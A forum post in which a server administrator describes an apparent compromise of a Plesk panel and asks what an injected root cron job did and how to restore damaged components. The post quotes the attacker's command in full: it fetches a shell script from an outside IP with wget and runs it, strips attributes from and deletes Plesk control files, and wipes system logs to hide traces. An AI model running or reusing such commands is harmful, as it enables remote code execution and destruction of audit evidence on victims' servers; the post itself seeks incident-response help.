Hi, I have received an attack that probably exploited the vulnerability described in: http://kb.parallels.com/en/113321 Someone or something was able to inject a cronjob into my server which ran: Cron <root@ks3094309> cd /tmp;wget http://220.127.116.11:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/cron;rm -Rf /var/log/secure;rm -Rf /var/log/lastlog;rm -Rf /var/log/auth.log;cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php;mv old.php agenti.php;mv Agent.php agenti.php Among other things this downloads and executes a shell script. I'm already investigating the content of the script and how to revert (if possible) the changes it did. However, the command above does also other things that I don't understand. It seems like it screwed up some components of Plesk. AFTER this, I installed all the updates and ran the vulnerability check available here: http://kb.parallels.com/en/113424 which returned OK (it didn't before the updates). The question is: can anybody explain me what the abovementioned commands do, what components of psa may have been compromised, and how I can restore them? (not taking into account the execution of the downloaded shell script, of course). Or can I assume that by installing the updates, any compromised Plesk components have been restored? (I guess not) Thanks m.